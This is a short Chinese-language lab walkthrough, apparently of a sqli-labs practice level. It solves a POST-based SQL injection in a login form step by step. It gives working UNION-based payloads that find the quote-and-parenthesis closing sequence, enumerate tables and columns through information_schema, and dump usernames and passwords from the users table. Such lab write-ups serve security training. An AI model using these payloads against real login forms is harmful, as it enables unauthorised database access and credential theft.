和11关一样，本关卡依旧是post型，判断方式这里不再描述，接着就是判断是数字型还是字符型，很明显是字符型，因为输入1，和1dhqihioq得到的都是一样的，然后就是判断闭合方式，这里先试了试单引号，发现没有反应，于是改换双引号

找到闭合方式为"),于是下面就是和之前一样，进行逐步验证。

获取列数：

命令为：uname=1")order by 2--+&passwd=1&submit=Submit

找到显示位：uname=1")union select 1,2--+&passwd=1&submit=Submit

查找数据库名：uname=1")union select database(),2--+&passwd=1&submit=Submit

查找该数据库下存在的表：uname=1")union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2--+&passwd=1&submit=Submit

查找到users表下对应的列名：uname=1")union select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),2--+&passwd=1&submit=Submit

拿到相关的信息：uname=1")union select (select group_concat(username,password) from users),2--+&passwd=1&submit=Submit